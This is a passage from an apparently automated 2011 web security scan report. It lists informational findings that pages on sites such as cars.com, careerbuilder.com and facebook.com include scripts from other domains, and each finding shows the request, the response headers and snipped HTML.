http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js
http://img.icbdr.com/v13.42/Common/js/cbatlascore.js
http://img.icbdr.com/v13.42/Common/js/contentrequest.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/jobsearching.js
http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v13.42/Common/js/popup.js
http://img.icbdr.com/v13.42/Common/js/searchbar.js

Request

GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50843
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
zOmNvbnRyYWN0b3IFC2FzOnBhcnR0aW1lBQlhczppbnRlcm4FD2FzOnNlYXNvbmFsVGVtcAUWYXM6ZXhfUmVnaW9uYWxOYXRpb25hbAUUYXM6ZXhfbm9udHJhZGl0aW9uYWwFE2FzOnNfaW5jbHVkZXplcm9wYXlRRBwJE1ro9PC9XK78A2BXQ565FQ==" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/contentrequest.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/popup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/searchbar.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.28. http://www.cars.com/go/advice/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/advice/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cdn.cars.advice/index;sz=300x250;area=advice.adviceindex;aff=national;lang=en;u=300x250||national|||||||||advice.adviceindex|||||en;tile=2;ord=1315099529728?
http://ad.doubleclick.net/adj/cdn.cars.advice/index;sz=728x90,970x66;area=advice.adviceindex;aff=national;lang=en;u=728x90,970x66||national|||||||||advice.adviceindex|||||en;tile=1;ord=1315099529728?
http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js

Request

GET /go/advice/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 45669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/index;sz=728x90,970x66;area=advice.adviceindex;aff=national;lang=en;u=728x90,970x66||national|||||||||advice.adviceindex|||||en;tile=1;ord=1315099529728?"></script>
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/index;sz=300x250;area=advice.adviceindex;aff=national;lang=en;u=300x250||national|||||||||advice.adviceindex|||||en;tile=2;ord=1315099529728?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.29. http://www.cars.com/go/advice/shopping/cpo/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/advice/shopping/cpo/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=1x1;detail=bglogo;area=research.cpo.cpo;aff=national;lang=en;u=1x1||national||||||||bglogo|research.cpo.cpo|||||en;tile=3;ord=1315099529989?
http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=1x1;detail=cpopixel;area=research.cpo.cpo;aff=national;lang=en;u=1x1||national||||||||cpopixel|research.cpo.cpo|||||en;tile=2;ord=1315099529989?
http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=300x250;area=research.cpo.cpo;aff=national;lang=en;u=300x250||national|||||||||research.cpo.cpo|||||en;tile=4;ord=1315099529989?
http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=728x90,970x66;area=research.cpo.cpo;aff=national;lang=en;u=728x90,970x66||national|||||||||research.cpo.cpo|||||en;tile=1;ord=1315099529989?
http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js

Request

GET /go/advice/shopping/cpo/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 28814
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script type="text/javascript" src="/js/lib/jquery/1_3_2/jquery.min.js"></s
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=728x90,970x66;area=research.cpo.cpo;aff=national;lang=en;u=728x90,970x66||national|||||||||research.cpo.cpo|||||en;tile=1;ord=1315099529989?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=1x1;detail=cpopixel;area=research.cpo.cpo;aff=national;lang=en;u=1x1||national||||||||cpopixel|research.cpo.cpo|||||en;tile=2;ord=1315099529989?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=1x1;detail=bglogo;area=research.cpo.cpo;aff=national;lang=en;u=1x1||national||||||||bglogo|research.cpo.cpo|||||en;tile=3;ord=1315099529989?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.advice/cpo;sz=300x250;area=research.cpo.cpo;aff=national;lang=en;u=300x250||national|||||||||research.cpo.cpo|||||en;tile=4;ord=1315099529989?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.30. http://www.cars.com/go/crp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/crp/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=1x1;detail=regional_shortcut;area=research.research;aff=national;lang=en;u=1x1||national||||||||regional_shortcut|research.research|||||en;tile=3;ord=1315099527256?
http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=300x250;area=research.research;aff=national;lang=en;u=300x250||national|||||||||research.research|||||en;tile=2;ord=1315099527256?
http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=728x90,970x66;area=research.research;aff=national;lang=en;u=728x90,970x66||national|||||||||research.research|||||en;tile=1;ord=1315099527256?
http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js

Request

GET /go/crp/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:10 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000Wi7Ob1JlqbXe34f3Rg8tOMg:15mijjg76; Path=/
Set-Cookie: Registration=currentUserId:os2h00mIJBCqaXrpC3yMnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQuctqROfU3Gx6shhrLor0ffNW2iOUVe7nWvIF4VeWiUYU=; Expires=Fri, 02 Sep 2016 01:25:27 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=national; Expires=Sun, 25 Sep 2011 01:25:27 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=728x90,970x66;area=research.research;aff=national;lang=en;u=728x90,970x66||national|||||||||research.research|||||en;tile=1;ord=1315099527256?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=300x250;area=research.research;aff=national;lang=en;u=300x250||national|||||||||research.research|||||en;tile=2;ord=1315099527256?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research/index;sz=1x1;detail=regional_shortcut;area=research.research;aff=national;lang=en;u=1x1||national||||||||regional_shortcut|research.research|||||en;tile=3;ord=1315099527256?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.31. http://www.cars.com/go/kbb/kbbInput.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/kbb/kbbInput.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cdn.cars.research.new/kbb;sz=160x600;area=research.kbb;aff=national;lang=en;u=160x600||national|||||||||research.kbb|||||en;tile=2;ord=1315099537503?
http://ad.doubleclick.net/adj/cdn.cars.research.new/kbb;sz=728x90,970x66;area=research.kbb;aff=national;lang=en;u=728x90,970x66||national|||||||||research.kbb|||||en;tile=1;ord=1315099537503?
http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js

Request

GET /go/kbb/kbbInput.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:20 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 18484
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:37 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.new/kbb;sz=728x90,970x66;area=research.kbb;aff=national;lang=en;u=728x90,970x66||national|||||||||research.kbb|||||en;tile=1;ord=1315099537503?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.new/kbb;sz=160x600;area=research.kbb;aff=national;lang=en;u=160x600||national|||||||||research.kbb|||||en;tile=2;ord=1315099537503?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.32. http://www.cars.com/go/photogalleries/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/photogalleries/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=160x600;area=research.photogallery;aff=national;lang=en;u=160x600||national|||||||||research.photogallery|||||en;tile=3;ord=1315099534200?
http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=1x1;detail=bglogo;area=research.photogallery;aff=national;lang=en;u=1x1||national||||||||bglogo|research.photogallery|||||en;tile=2;ord=1315099534200?
http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=728x90,970x66;area=research.photogallery;aff=national;lang=en;u=728x90,970x66||national|||||||||research.photogallery|||||en;tile=1;ord=1315099534200?
http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js

Request

GET /go/photogalleries/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:17 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 35059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<title>Car Phot
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=728x90,970x66;area=research.photogallery;aff=national;lang=en;u=728x90,970x66||national|||||||||research.photogallery|||||en;tile=1;ord=1315099534200?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=1x1;detail=bglogo;area=research.photogallery;aff=national;lang=en;u=1x1||national||||||||bglogo|research.photogallery|||||en;tile=2;ord=1315099534200?"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/cdn.cars.research.photos/gallery;sz=160x600;area=research.photogallery;aff=national;lang=en;u=160x600||national|||||||||research.photogallery|||||en;tile=3;ord=1315099534200?"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.33. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.cinesport.com/container.js
http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBCB_CO&rssid=CB_CO_jbstrm&num=50&kw=CustomField3:CHARLOTTTJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[& mi_cb_search_box &]
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 110282
Expires: Sun, 04 Sep 2011 01:00:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:00:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
</a>

<script type="text/javascript"
src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div id='mi_top_job' style="">
<script type='text/javascript' src='http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBCB_CO&rssid=CB_CO_jbstrm&num=50&kw=CustomField3:CHARLOTTTJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[& mi_cb_search_box &]'></script>
...[SNIP]...
<div class="railunit">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...

21.34. http://www.charlotteobserver.com/advertising/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/advertising/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

Request

GET /advertising/index.html HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.35. http://www.charlotteobserver.com/newsroom/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/newsroom/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

Request

GET /newsroom/index.html HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.36. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.199.40
Connection: close
Date: Sun, 04 Sep 2011 01:25:57 GMT
Content-Length: 4255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/GjAkfCLY2D7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
...[SNIP]...

21.37. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

Response

21.38. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportssouthwest.com
Path:	/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://blstj.msn.com/br/chan/udc/js/udctrack.2011.05.06.js
http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js
http://msn.foxsports.com/fsn/msnSportsbar?msn=true&sportsBar=true&sportsBarSport=-1&fsnDomain=foxsportssouthwest
http://wac.24c5.edgecastcdn.net/8024C5/platform/common/js/jquery-1.4.2.min.js

Request

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 04 Sep 2011 01:26:08 GMT
Date: Sun, 04 Sep 2011 01:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<link href="/commonCSS/component_v2_footer_bottomstrip.css?cachebust=1315099568" rel="stylesheet" type="text/css" >
<script language="javascript" src="http://wac.24C5.edgecastcdn.net/8024C5/platform/common/js/jquery-1.4.2.min.js" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
</script>-->

<script language="javascript" src="http://Ads1.msn.com/library/dap.js" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
<div id="udc">
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>

<script type="text/javascript" src="http://blstj.msn.com/br/chan/udc/js/udctrack.2011.05.06.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://msn.foxsports.com/fsn/msnSportsbar?msn=true&sportsBar=true&sportsBarSport=-1&fsnDomain=foxsportssouthwest"></script>
...[SNIP]...

21.39. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freep.com
Path:	/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.eplayer.performgroup.com/flash/js/performgroup.js
http://static.eplayer.performgroup.com/flash/js/swfobject.js

Request

GET /article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football HTTP/1.1
Host: www.freep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Sun, 04 Sep 2011 01:26:09 GMT
X-Processing-begin: MOC-WN0324, on site C4 (2011-09-03 21:26:09:818)
Content-Type: text/html
X-Processing-finished: MOC-WN0324, on site C4 (2011-09-03 21:26:09:943)
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 01:26:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:meebo="http://www.meebo.com" lang="en">

<head>
<title>Rokeyta Roberson: spar
...[SNIP]...
</div> <script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/swfobject.js'></script><script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/performgroup.js'></script>
...[SNIP]...

21.40. http://www.goutsa.com/ViewArticle.dbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goutsa.com
Path:	/ViewArticle.dbml

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure-us.imrworldwide.com/v52.js
https://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js

Request

GET /ViewArticle.dbml HTTP/1.1
Host: www.goutsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:11 GMT
Server: Apache
P3P: policyref="http://www.goutsa.com/TermsAndConditions.dbml?DB_OEM_ID=13100", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 68639
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma
...[SNIP]...


               <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

21.41. http://www.greenbiz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenbiz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.greenerworldmedia.com/servlet/ajrotator/253106/0/vj?z=greenbiz&dim=219483&abr=$scriptiniframe
http://ads.greenerworldmedia.com/servlet/ajrotator/283275/0/vj?z=greenbiz&dim=219482&kw=&click=&abr=$scriptiniframe
http://ads.greenerworldmedia.com/servlet/ajrotator/391841/0/vj?z=greenbiz&dim=391839&total=20&adseparator=<BR><BR>
http://ads.greenerworldmedia.com/servlet/ajrotator/504627/0/vj?z=greenbiz&dim=412551&abr=$scriptiniframe
http://img1.adjuggler.com/banners/ajtg.js
http://img1.cdn.adjuggler.com/banners/ajtg.js
http://www.surveymonkey.com/jsPop.aspx?sm=pB7bRgijiomDdE8hmU_2fvtA_3d_3d

Request

GET / HTTP/1.1
Host: www.greenbiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:26:12 GMT
Server: Apache/2.2.15 (EL)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 04 Sep 2011 01:05:09 GMT
ETag: "e348a9db56d9d40996ad2334966342ce"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Cache: MISS from localhost
X-Cache-Lookup: HIT from localhost:80
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
